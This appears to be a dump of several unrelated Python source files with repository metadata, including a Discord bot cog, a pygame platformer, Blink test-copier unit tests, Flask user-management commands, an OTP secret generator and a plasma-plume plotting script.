embed = discord.Embed(colour=self.bot.colour, title=word.lower())
embed.description = ', '.join(ret)
await ctx.send(embed=embed)
@word.command(aliases=['ant'])
async def antonyms(self, ctx, *, word):
"""Shows you the antonyms of a word."""
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.antonym, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
embed.description = ', '.join(ret)
await ctx.send(embed=embed)
@word.command()
async def many(self, ctx, *words):
"""Get information on many words"""
command = self.bot.get_command('words')
await ctx.invoke(command, *words)
@commands.command()
async def words(self, ctx, *words):
"""Get information on many words"""
async with ctx.typing():
_dict = dictionary(*words)
try:
ret = await self.bot.loop.run_in_executor(None, _dict.getMeanings)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour)
embed.title = "Words"
not_found = list()
for word in words:
meanings = ret.get(word)
if not meanings:
not_found.append(word)
continue
embed.add_field(name=word.lower(), value=self.format_meanings(meanings))
if not_found:
embed.set_footer(text=', '.join(not_found) + " were not found.")
try:
await ctx.send(embed=embed)
except discord.HTTPException:
return await ctx.send("You passed in too many words!")
@commands.command()
async def ship(self, ctx, member_1: discord.Member, member_2: discord.Member):
"""Ship 2 members"""
from random import randint
rate = randint(1, 100)
await ctx.send(f"""**{member_1}** | <a:hug:748315930685210746> {rate}% :heart: | **{member_2}**""")
def setup(bot):
bot.add_cog(Fun(bot))
| 6,035 | 0 | 575 |
aba5777a4c926a5861081c3fc23ee89efd72f0ec | 369 | py | Python | LinkStation01/linkstation.py | userSoni/LinkStation_Nord | 302ecbe5f817e8130863d9a78a7061da6a91ab8a | [
"MIT"
] | null | null | null | LinkStation01/linkstation.py | userSoni/LinkStation_Nord | 302ecbe5f817e8130863d9a78a7061da6a91ab8a | [
"MIT"
] | null | null | null | LinkStation01/linkstation.py | userSoni/LinkStation_Nord | 302ecbe5f817e8130863d9a78a7061da6a91ab8a | [
"MIT"
] | null | null | null | from point import Point | 21.705882 | 45 | 0.520325 | from point import Point
class LinkStation(Point):
def __init__(self, x, y, reach):
super().__init__(x, y)
self.reach = reach
def get_power(self, other):
distance = super().__add__(other)
if distance > self.reach:
return(self.reach - distance)**2
else:
return 0 | 259 | 4 | 83 |
7fec8510d8834d53c7b7fbb66f1d96b267c28dfc | 1,764 | py | Python | PLM/cores/base/BaseProfile.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | 7 | 2017-12-22T02:49:58.000Z | 2018-05-09T05:29:06.000Z | PLM/cores/base/BaseProfile.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | null | null | null | PLM/cores/base/BaseProfile.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | 3 | 2019-03-11T21:54:52.000Z | 2019-11-25T11:23:17.000Z | # -*- coding: utf-8 -*-
"""
Script Name:
Author: Do Trinh/Jimmy - 3D artist.
Description:
"""
# -------------------------------------------------------------------------------------------------------------
""" Import """
from pyPLM.damg import DAMGDICT
# -------------------------------------------------------------------------------------------------------------
# Created by Trinh Do on 5/6/2020 - 3:13 AM
# © 2017 - 2020 DAMGteam. All rights reserved
| 20.045455 | 111 | 0.452381 | # -*- coding: utf-8 -*-
"""
Script Name:
Author: Do Trinh/Jimmy - 3D artist.
Description:
"""
# -------------------------------------------------------------------------------------------------------------
""" Import """
from pyPLM.damg import DAMGDICT
class BaseProfile(DAMGDICT):
key = 'BaseProfile'
_ip = None
_city = None
_country = None
_latitude = None
_longtitude = None
def __init__(self, parent=None):
super(BaseProfile, self).__init__()
self._parent = parent
@property
def parent(self):
return self._parent
@property
def ip(self):
return self._ip
@property
def city(self):
return self._city
@property
def country(self):
return self._country
@property
def latitude(self):
return self._latitude
@property
def longtitue(self):
return self._longtitude
@parent.setter
def parent(self, val):
self._parent = val
@ip.setter
def ip(self, val):
self._ip = val
@city.setter
def city(self, val):
self._city = val
@country.setter
def country(self, val):
self._country = val
@latitude.setter
def latitude(self, val):
self._latitude = val
@longtitue.setter
def longtitue(self, val):
self._longtitude = val
# -------------------------------------------------------------------------------------------------------------
# Created by Trinh Do on 5/6/2020 - 3:13 AM
# © 2017 - 2020 DAMGteam. All rights reserved
| 472 | 803 | 23 |
7ac6e00808fd150fa05e6e5250a60150d5b436c5 | 538 | py | Python | test/unit/test_dealer.py | fedden/pluribus | 73fb394b26623c897459ffa3e66d7a5cb47e9962 | [
"MIT"
] | 2 | 2020-01-12T07:59:56.000Z | 2020-01-13T10:04:26.000Z | test/unit/test_dealer.py | fedden/pluribus | 73fb394b26623c897459ffa3e66d7a5cb47e9962 | [
"MIT"
] | null | null | null | test/unit/test_dealer.py | fedden/pluribus | 73fb394b26623c897459ffa3e66d7a5cb47e9962 | [
"MIT"
] | null | null | null | from poker_ai.poker.dealer import Dealer
from poker_ai.poker.card import Card
| 33.625 | 54 | 0.67658 | from poker_ai.poker.dealer import Dealer
from poker_ai.poker.card import Card
def test_dealer_1():
include_ranks = [10, 11, 12, 13, 14]
dealer = Dealer(include_ranks=include_ranks)
deck_size = len(dealer.deck._cards_in_deck)
assert deck_size == len(include_ranks * 4)
for i in range(1, deck_size + 1):
card: Card = dealer.deal_card()
del card
deck_size = len(dealer.deck._cards_in_deck)
assert deck_size == len(include_ranks * 4) - i
assert len(dealer.deck._dealt_cards) == i
| 436 | 0 | 23 |
63f49a94d2256bfdae63b7d1a67ab338901cf892 | 7,117 | py | Python | minigame1/Minigame1.py | Tdallau/HRO_project2_minigames | 7fdecaa942d1a05d2cd451fd7f5d47e51c571c42 | [
"MIT"
] | null | null | null | minigame1/Minigame1.py | Tdallau/HRO_project2_minigames | 7fdecaa942d1a05d2cd451fd7f5d47e51c571c42 | [
"MIT"
] | null | null | null | minigame1/Minigame1.py | Tdallau/HRO_project2_minigames | 7fdecaa942d1a05d2cd451fd7f5d47e51c571c42 | [
"MIT"
] | null | null | null | import pygame
import sys
import os
import csv
import random
from pygame import *
from minigame1.Player import *
from minigame1.Mobs import *
from minigame1.Camera import *
from minigame1.KeyBlock import *
from minigame1.PilarBlock import *
from minigame1.Text import *
from minigame1.HighScore import *
from pprint import pprint
| 31.772321 | 147 | 0.529156 | import pygame
import sys
import os
import csv
import random
from pygame import *
from minigame1.Player import *
from minigame1.Mobs import *
from minigame1.Camera import *
from minigame1.KeyBlock import *
from minigame1.PilarBlock import *
from minigame1.Text import *
from minigame1.HighScore import *
from pprint import pprint
def Tim_2dPlatform():
    """Run the 2D-platform mini-game loop; returns the HighScore when the
    player finishes and presses 'c'.

    Relies on Player/Mobs/Camera/Text/HighScore from the minigame1 package
    (star-imported at module level) and on pygame being importable.
    """
    # Window / display constants.
    WIN_WIDTH = 800
    WIN_HEIGHT = 640
    HALF_WIDTH = int(WIN_WIDTH / 2)
    HALF_HEIGHT = int(WIN_HEIGHT / 2)
    DISPLAY = (WIN_WIDTH, WIN_HEIGHT)
    DEPTH = 32
    FLAGS = 0
    CAMERA_SLACK = 30
    global cameraX, cameraY
    pygame.init()
    screen = pygame.display.set_mode(DISPLAY, FLAGS, DEPTH)
    pygame.display.set_caption("2D platform")
    timer = pygame.time.Clock()
    # Tick count at game start; elapsed time is shown as the score.
    start_tick = pygame.time.get_ticks()
    # Fallback chain for font lookup; the joke entries fall through to Comic Sans.
    font_preferences = [
        "Bizarre-Ass Font Sans Serif",
        "They definitely dont have this installed Gothic",
        "Papyrus",
        "Comic Sans MS"]
    # Current input state flags, toggled by KEYDOWN/KEYUP events below.
    up = down = left = right = running = False
    bg = pygame.image.load(os.path.join("images","strand.jpg")).convert()
    screen.blit(bg,(0,0))
    scoreboard = Surface((180,70))
    scoreboard.fill((255,255,255))
    screen.blit(scoreboard,(scoreboard.get_width(),0))
    print(scoreboard.get_width())
    entities = pygame.sprite.Group()
    mobs = pygame.sprite.Group()
    player = Player(screen,font_preferences, entities, 32, 640)
    mob = Mobs(265,WIN_HEIGHT + 64,1)
    platforms = []
    x = y = 0
    # Populate platforms/entities from a randomly chosen level CSV.
    drawLevel(x,y,platforms,entities)
    # Level is a 44x25 grid of 32px tiles.
    total_level_width = 44*32
    total_level_height = 25*32
    camera = Camera(complex_camera, total_level_width, total_level_height)
    entities.add(player)
    entities.add(mob)
    mobs.add(mob)
    heighscore = HighScore(0)
    active = True
    #end of game message
    t = Text("Je hebt deze mini-game uitgespeeld. klik op r om de mini-game te reseten of op c om af te sluiten.", font_preferences, 25, (0, 0, 0))
    text = t.create_text()
    #scoreboard tile
    st = Text("Highscore: | Score: ", font_preferences, 20, (0,0,0))
    st_text = st.create_text()
    while active:
        # Cap the frame rate at 30 FPS.
        timer.tick(30)
        # pygame.mixer.music.load("strand.mp3")
        # pygame.mixer.music.play()
        # if not player.finished:
        for e in pygame.event.get():
            if e.type == pygame.QUIT:
                pygame.quit()
                sys.exit()
            if e.type == pygame.KEYDOWN and e.key == pygame.K_ESCAPE:
                pygame.quit()
                sys.exit()
            if player.finished:
                # 'c' closes the mini-game and reports the time as the score.
                if e.type == pygame.KEYDOWN and e.key == pygame.K_c:
                    heighscore.checkForHighScore(seconde)
                    return heighscore
                # 'r' resets player state and rebuilds a fresh level.
                if e.type == pygame.KEYDOWN and e.key == pygame.K_r:
                    heighscore.checkForHighScore(seconde)
                    player.inventory.clearInventory()
                    player.rect.x = 32
                    player.rect.y = 640
                    player.xvel = 0
                    player.yvel = 0
                    player.finished = False
                    start_tick = pygame.time.get_ticks()
                    # k = KeyBlock(player.backupKey_x,player.backupKey_y)
                    # entities.add(k)
                    # platforms.append(k)
                    entities = pygame.sprite.Group()
                    entities.add(player)
                    entities.add(mob)
                    player.entities = entities
                    platforms = []
                    x = y = 0
                    drawLevel(x,y,platforms,entities)
                    # mob = Mobs(265,WIN_HEIGHT + 64,1)
                    mob.rect.x = 265
                    mob.rect.y = WIN_HEIGHT + 64
                    # mobs.add(mob)
            if not player.finished:
                # Track pressed/released movement keys while the game runs.
                if e.type == pygame.KEYDOWN and e.key == pygame.K_UP:
                    up = True
                if e.type == pygame.KEYDOWN and e.key == pygame.K_DOWN:
                    down = True
                if e.type == pygame.KEYDOWN and e.key == pygame.K_LEFT:
                    left = True
                if e.type == pygame.KEYDOWN and e.key == pygame.K_RIGHT:
                    right = True
                if e.type == pygame.KEYDOWN and e.key == pygame.K_SPACE:
                    running = True
                if e.type == pygame.KEYUP and e.key == pygame.K_UP:
                    up = False
                if e.type == pygame.KEYUP and e.key == pygame.K_DOWN:
                    down = False
                if e.type == pygame.KEYUP and e.key == pygame.K_RIGHT:
                    right = False
                if e.type == pygame.KEYUP and e.key == pygame.K_LEFT:
                    left = False
        # draw background
        screen.blit(bg,(0,0))
        scoreboard.fill((255,255,255))
        scoreboard.blit(st_text,(0,0))
        #highscore amound
        hsa = Text(str(heighscore.amound), font_preferences, 20, (0,0,0))
        hsa_text = hsa.create_text()
        scoreboard.blit(hsa_text,(20,st_text.get_height() + 10))
        if not player.finished:
            # Current score = whole seconds elapsed since start/reset.
            seconde = (pygame.time.get_ticks() - start_tick )//1000
            tm = Text(str(seconde), font_preferences, 20, (0, 0, 0))
            tm_text = tm.create_text()
            scoreboard.blit(tm_text,
                (scoreboard.get_width() - (scoreboard.get_width() / 2) + 40 , st_text.get_height() + 10))
        #draw scoreboard
        # scoreboard.fill((255,255,255))
        screen.blit(scoreboard,(scoreboard.get_width() - 100,0))
        camera.update(player)
        # update player, draw everything else
        player.update(up, down, left, right, running, platforms, mobs)
        mob.update(mobs,platforms,entities)
        for e in entities:
            screen.blit(e.image, camera.apply(e))
        if player.finished:
            # Show the end-of-game message (Dutch) centred on screen.
            screen.blit(text,
                (320 - text.get_width() // 2, 400 - text.get_height() // 2))
        entities = player.entities
        mobs = mob.mobs
        pygame.display.update()
def drawLevel (x,y,platforms,entities):
    """Build a level by reading a randomly chosen CSV tile map.

    Starting at tile position (x, y), walks the ';'-separated grid and, for
    each tile code, appends a block sprite to `platforms` and `entities`
    (both are mutated in place). Tile codes: P=Platform, E=ExitBlock,
    K=KeyBlock, B=PilarBlock; each tile is 32px wide/high.

    Block classes come from the minigame1 star imports at module level --
    presumably Platform/ExitBlock live in one of those modules; verify.
    """
    levels = ["level1", "level2", "level3"]
    readCSV = ''
    row = ''
    col = ''
    # print(levels[random.randint(0,1)])
    # build the level
    # Picks one of the three level files at random (relative to the CWD).
    with open(levels[random.randint(0,2)] + ".csv") as csvfile:
        readCSV = csv.reader(csvfile, delimiter=';')
        for row in readCSV:
            for col in row:
                if col == "P":
                    p = Platform(x, y)
                    platforms.append(p)
                    entities.add(p)
                if col == "E":
                    e = ExitBlock(x, y)
                    platforms.append(e)
                    entities.add(e)
                if col == "K":
                    k = KeyBlock(x, y)
                    platforms.append(k)
                    entities.add(k)
                if col == "B":
                    b = PilarBlock(x, y)
                    platforms.append(b)
                    entities.add(b)
                x += 32
            y += 32
            x = 0
    # NOTE(review): debug leftover -- prints the exhausted csv.reader object,
    # not the parsed rows.
    print(readCSV)
| 6,732 | 0 | 46 |
60f526518d09f8565abde81e7e957b5c348fcd01 | 5,014 | py | Python | third_party/blink/tools/blinkpy/w3c/test_copier_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | third_party/blink/tools/blinkpy/w3c/test_copier_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | third_party/blink/tools/blinkpy/w3c/test_copier_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | # Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
from blinkpy.common.host_mock import MockHost
from blinkpy.common.path_finder import RELATIVE_WEB_TESTS
from blinkpy.common.system.executive_mock import MockExecutive, ScriptError
from blinkpy.common.system.filesystem_mock import MockFileSystem
from blinkpy.common.system.log_testing import LoggingTestCase
from blinkpy.w3c.test_copier import TestCopier
MOCK_WEB_TESTS = '/mock-checkout/' + RELATIVE_WEB_TESTS
FAKE_SOURCE_REPO_DIR = '/blink'
FAKE_FILES = {
MOCK_WEB_TESTS + 'external/OWNERS': '',
'/blink/w3c/dir/has_shebang.txt': '#!',
'/blink/w3c/dir/README.txt': '',
'/blink/w3c/dir/OWNERS': '',
'/blink/w3c/dir/reftest.list': '',
MOCK_WEB_TESTS + 'external/README.txt': '',
MOCK_WEB_TESTS + 'W3CImportExpectations': '',
}
| 39.793651 | 90 | 0.631432 | # Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
from blinkpy.common.host_mock import MockHost
from blinkpy.common.path_finder import RELATIVE_WEB_TESTS
from blinkpy.common.system.executive_mock import MockExecutive, ScriptError
from blinkpy.common.system.filesystem_mock import MockFileSystem
from blinkpy.common.system.log_testing import LoggingTestCase
from blinkpy.w3c.test_copier import TestCopier
MOCK_WEB_TESTS = '/mock-checkout/' + RELATIVE_WEB_TESTS
FAKE_SOURCE_REPO_DIR = '/blink'
FAKE_FILES = {
MOCK_WEB_TESTS + 'external/OWNERS': '',
'/blink/w3c/dir/has_shebang.txt': '#!',
'/blink/w3c/dir/README.txt': '',
'/blink/w3c/dir/OWNERS': '',
'/blink/w3c/dir/reftest.list': '',
MOCK_WEB_TESTS + 'external/README.txt': '',
MOCK_WEB_TESTS + 'W3CImportExpectations': '',
}
class TestCopierTest(LoggingTestCase):
    """Unit tests for TestCopier's import scanning and file copying."""

    def _copier_with_files(self, files):
        """Return (host, copier) backed by a mock filesystem seeded with *files*."""
        host = MockHost()
        host.filesystem = MockFileSystem(files=files)
        return host, TestCopier(host, FAKE_SOURCE_REPO_DIR)

    def test_import_dir_with_no_tests(self):
        # Keep the original construction order: the failing executive is
        # installed before TestCopier is built.
        host = MockHost()
        host.executive = MockExecutive(exception=ScriptError('error'))
        host.filesystem = MockFileSystem(files=FAKE_FILES)
        copier = TestCopier(host, FAKE_SOURCE_REPO_DIR)
        copier.do_import()  # No exception raised.

    def test_does_not_import_owner_files(self):
        _, copier = self._copier_with_files(FAKE_FILES)
        copier.find_importable_tests()
        expected_copies = [
            {'dest': 'has_shebang.txt', 'src': '/blink/w3c/dir/has_shebang.txt'},
            {'dest': 'README.txt', 'src': '/blink/w3c/dir/README.txt'},
        ]
        self.assertEqual(
            copier.import_list,
            [{'copy_list': expected_copies, 'dirname': '/blink/w3c/dir'}])

    def test_does_not_import_reftestlist_file(self):
        _, copier = self._copier_with_files(FAKE_FILES)
        copier.find_importable_tests()
        expected_copies = [
            {'dest': 'has_shebang.txt', 'src': '/blink/w3c/dir/has_shebang.txt'},
            {'dest': 'README.txt', 'src': '/blink/w3c/dir/README.txt'},
        ]
        self.assertEqual(
            copier.import_list,
            [{'copy_list': expected_copies, 'dirname': '/blink/w3c/dir'}])

    def test_files_with_shebang_are_made_executable(self):
        host, copier = self._copier_with_files(FAKE_FILES)
        copier.do_import()
        self.assertEqual(
            host.filesystem.executable_files,
            set([MOCK_WEB_TESTS + 'external/blink/w3c/dir/has_shebang.txt']))

    def test_ref_test_with_ref_is_copied(self):
        ref_test = '/blink/w3c/dir1/my-ref-test.html'
        ref_file = '/blink/w3c/dir1/ref-file.html'
        files = {
            ref_test: '<html><head><link rel="match" href="ref-file.html" />test</head></html>',
            ref_file: '<html><head>test</head></html>',
            MOCK_WEB_TESTS + 'W3CImportExpectations': '',
        }
        _, copier = self._copier_with_files(files)
        copier.find_importable_tests()
        # The reference file is listed before the test that points at it.
        self.assertEqual(copier.import_list, [{
            'copy_list': [
                {'src': ref_file, 'dest': 'ref-file.html'},
                {'src': ref_test, 'dest': 'my-ref-test.html'},
            ],
            'dirname': '/blink/w3c/dir1',
        }])
| 2,747 | 17 | 157 |
d5386382d1006c88589c40562d15a92314c4d07c | 1,106 | py | Python | backend/paperchase/manage/users.py | dedalusj/PaperChase | 728cd2f742275b12223d91613275358fb4a92feb | [
"MIT"
] | 3 | 2015-02-13T02:42:39.000Z | 2016-11-22T08:03:45.000Z | backend/paperchase/manage/users.py | dedalusj/PaperChase | 728cd2f742275b12223d91613275358fb4a92feb | [
"MIT"
] | null | null | null | backend/paperchase/manage/users.py | dedalusj/PaperChase | 728cd2f742275b12223d91613275358fb4a92feb | [
"MIT"
] | 1 | 2020-10-10T08:35:16.000Z | 2020-10-10T08:35:16.000Z | # -*- coding: utf-8 -*-
"""
paperchase.manage.journals
~~~~~~~~~~~~~~~~~~~~~
jorunals management commands
"""
import datetime
from flask.ext.script import Command, prompt, prompt_pass
from werkzeug.datastructures import MultiDict
from ..services import users | 29.891892 | 166 | 0.631103 | # -*- coding: utf-8 -*-
"""
paperchase.manage.journals
~~~~~~~~~~~~~~~~~~~~~
jorunals management commands
"""
import datetime
from flask.ext.script import Command, prompt, prompt_pass
from werkzeug.datastructures import MultiDict
from ..services import users
class CreateUser(Command):
def run(self):
email = prompt('email')
password = prompt_pass('password')
confirm_password = prompt_pass('confirm password')
if password != confirm_password:
print '\nMismatching passwords'
return
user = users.create( email = email, password = password, registered_at = datetime.datetime.utcnow(), active = True, confirmed_at = datetime.datetime.utcnow())
print '\nUser created successfully'
print 'User(id=%s email=%s)' % (user.id, user.title)
class DeleteUser(Command):
    """Interactive manage command: delete a user looked up by e-mail."""
    def run(self):
        email = prompt('User email')
        # `users.first` returns None when no user matches the e-mail.
        user = users.first(email = email)
        if not user:
            print 'Invalid user email'
            return
        users.delete(user)
        print 'User deleted successfully'
096913bfd7f5ce438837ebc5ce70ac71e4b5cab7 | 817 | py | Python | simpleotp/__init__.py | soumilrao/simple-otp | b1b5865850902f2b3e7b46e2205525daacb69fb4 | [
"MIT"
] | null | null | null | simpleotp/__init__.py | soumilrao/simple-otp | b1b5865850902f2b3e7b46e2205525daacb69fb4 | [
"MIT"
] | null | null | null | simpleotp/__init__.py | soumilrao/simple-otp | b1b5865850902f2b3e7b46e2205525daacb69fb4 | [
"MIT"
] | 2 | 2020-07-03T03:47:11.000Z | 2022-02-22T07:39:09.000Z | """Top-level package for simple-otp."""
__author__ = """Kshitij Nagvekar"""
__email__ = 'kshitij.nagvekar@workindia.in'
__version__ = '0.1.0'
try:
from secrets import SystemRandom
except ImportError:
from random import SystemRandom
from typing import Sequence
from .otp import OTP
random = SystemRandom()
def generate_secret(
length: int = 16,
chars: Sequence[str] = None
) -> str:
"""
Generates a secret which can be used as secret key
:param length: key length
:param chars: list of characters to be used to generate secret key
:return: secret key string
"""
if chars is None:
chars = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
return ''.join(
random.choice(chars)
for _ in range(length)
)
__all__ = ["generate_secret", "OTP"]
| 20.948718 | 70 | 0.673195 | """Top-level package for simple-otp."""
__author__ = """Kshitij Nagvekar"""
__email__ = 'kshitij.nagvekar@workindia.in'
__version__ = '0.1.0'
try:
from secrets import SystemRandom
except ImportError:
from random import SystemRandom
from typing import Sequence
from .otp import OTP
random = SystemRandom()
def generate_secret(
length: int = 16,
chars: Sequence[str] = None
) -> str:
"""
Generates a secret which can be used as secret key
:param length: key length
:param chars: list of characters to be used to generate secret key
:return: secret key string
"""
if chars is None:
chars = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
return ''.join(
random.choice(chars)
for _ in range(length)
)
__all__ = ["generate_secret", "OTP"]
| 0 | 0 | 0 |
6796c13cf7475026c9ef081da79d73b79b3ed231 | 1,777 | py | Python | cases/caseFoamEx/Cases/nEquivalentParticles_06/maxRadialWeightingFactor_04/graphCaseValidation.py | andytorrestb/rarefiedPlume | c09234c701c395d16519d8a361eae17540711530 | [
"MIT"
] | null | null | null | cases/caseFoamEx/Cases/nEquivalentParticles_06/maxRadialWeightingFactor_04/graphCaseValidation.py | andytorrestb/rarefiedPlume | c09234c701c395d16519d8a361eae17540711530 | [
"MIT"
] | null | null | null | cases/caseFoamEx/Cases/nEquivalentParticles_06/maxRadialWeightingFactor_04/graphCaseValidation.py | andytorrestb/rarefiedPlume | c09234c701c395d16519d8a361eae17540711530 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
# Find path for cases
curr_dir_path = os.path.dirname(os.path.realpath(__file__))
# print(curr_dir_path)
# cases = os.listdir(curr_dir_path + '/Cases')
# pop = cases.index('baseCase')
# cases.pop(pop)
# Label graph with bold characters
font_axis_publish = {
'color': 'black',
'weight': 'bold',
'size': 22,
}
# Read in digitized data
digi_n = pd.read_csv(
curr_dir_path + '/n_nstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'n_nstar']
)
digi_T = pd.read_csv(
curr_dir_path + '/T_Tstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'T_Tstar']
)
sim = pd.read_csv(
curr_dir_path + '/postProcessing/sampleDict/0.3/horizontalLine_Ttra_Ar_rhoN_Ar.csv'
)
print(sim['Ttra_Ar'])
sim = sim[['distance', 'rhoN_Ar', 'Ttra_Ar']].dropna()
sim['rhoN_Ar'] = sim['rhoN_Ar'] / 6.02e20
sim['Ttra_Ar'] = sim['Ttra_Ar'] / 800.0
plt.title('DSMC vs DAC', fontdict = font_axis_publish)
plt.ylabel('n/n*', fontdict = font_axis_publish)
plt.xlabel('r', fontdict = font_axis_publish)
plt.plot(digi_n['r'], digi_n['n_nstar'], label = 'digitized (DAC)')
plt.plot(sim['distance'], sim['rhoN_Ar'], label = 'simulated (DSMC)')
plt.legend()
plt.yscale('log')
plt.savefig(curr_dir_path + '/digitized_vs_analytical_n.png')
plt.close()
plt.title('DSMC vs DAC', fontdict = font_axis_publish)
plt.ylabel('T/T*', fontdict = font_axis_publish)
plt.xlabel('r', fontdict = font_axis_publish)
plt.plot(digi_T['r'], digi_T['T_Tstar'], label = 'digitized (DAC)')
plt.plot(sim['distance'], sim['Ttra_Ar'], label = 'simulated (DSMC)')
plt.legend()
plt.yscale('log')
plt.savefig(curr_dir_path + '/digitized_vs_analytical_T.png')
plt.close()
| 26.522388 | 87 | 0.670793 | import matplotlib.pyplot as plt
# Plot the DSMC simulation profiles against digitized DAC reference curves
# and save the comparison figures next to this script.
import numpy as np
import os
import pandas as pd
# Find path for cases
curr_dir_path = os.path.dirname(os.path.realpath(__file__))
# print(curr_dir_path)
# cases = os.listdir(curr_dir_path + '/Cases')
# pop = cases.index('baseCase')
# cases.pop(pop)
# Label graph with bold characters
font_axis_publish = {
    'color': 'black',
    'weight': 'bold',
    'size': 22,
}
# Read in digitized data
# Tab-separated radius vs. normalized number density / temperature.
digi_n = pd.read_csv(
    curr_dir_path + '/n_nstar_radius.dat',
    header = 0,
    sep = '\t',
    names = ['r', 'n_nstar']
)
digi_T = pd.read_csv(
    curr_dir_path + '/T_Tstar_radius.dat',
    header = 0,
    sep = '\t',
    names = ['r', 'T_Tstar']
)
# OpenFOAM sampleDict output at t = 0.3 for the horizontal sampling line.
sim = pd.read_csv(
    curr_dir_path + '/postProcessing/sampleDict/0.3/horizontalLine_Ttra_Ar_rhoN_Ar.csv'
)
print(sim['Ttra_Ar'])
sim = sim[['distance', 'rhoN_Ar', 'Ttra_Ar']].dropna()
# Normalize to reference values: 6.02e20 presumably the reference number
# density n*, 800.0 presumably the reference temperature T* -- TODO confirm.
sim['rhoN_Ar'] = sim['rhoN_Ar'] / 6.02e20
sim['Ttra_Ar'] = sim['Ttra_Ar'] / 800.0
# n/n* comparison, log scale.
plt.title('DSMC vs DAC', fontdict = font_axis_publish)
plt.ylabel('n/n*', fontdict = font_axis_publish)
plt.xlabel('r', fontdict = font_axis_publish)
plt.plot(digi_n['r'], digi_n['n_nstar'], label = 'digitized (DAC)')
plt.plot(sim['distance'], sim['rhoN_Ar'], label = 'simulated (DSMC)')
plt.legend()
plt.yscale('log')
plt.savefig(curr_dir_path + '/digitized_vs_analytical_n.png')
plt.close()
# T/T* comparison, log scale.
plt.title('DSMC vs DAC', fontdict = font_axis_publish)
plt.ylabel('T/T*', fontdict = font_axis_publish)
plt.xlabel('r', fontdict = font_axis_publish)
plt.plot(digi_T['r'], digi_T['T_Tstar'], label = 'digitized (DAC)')
plt.plot(sim['distance'], sim['Ttra_Ar'], label = 'simulated (DSMC)')
plt.legend()
plt.yscale('log')
plt.savefig(curr_dir_path + '/digitized_vs_analytical_T.png')
plt.close()
| 0 | 0 | 0 |
6d599e732315b98ff9361f50870da4ee3d6c72bc | 2,935 | py | Python | pointy/__init__.py | AlexLloyd0/pointy-mcpointface | 2c5f3edf14a1d3821933ba8daa3fd616366055a0 | [
"MIT"
] | 1 | 2017-11-22T15:12:39.000Z | 2017-11-22T15:12:39.000Z | pointy/__init__.py | AlexLloyd0/pointy-mcpointface | 2c5f3edf14a1d3821933ba8daa3fd616366055a0 | [
"MIT"
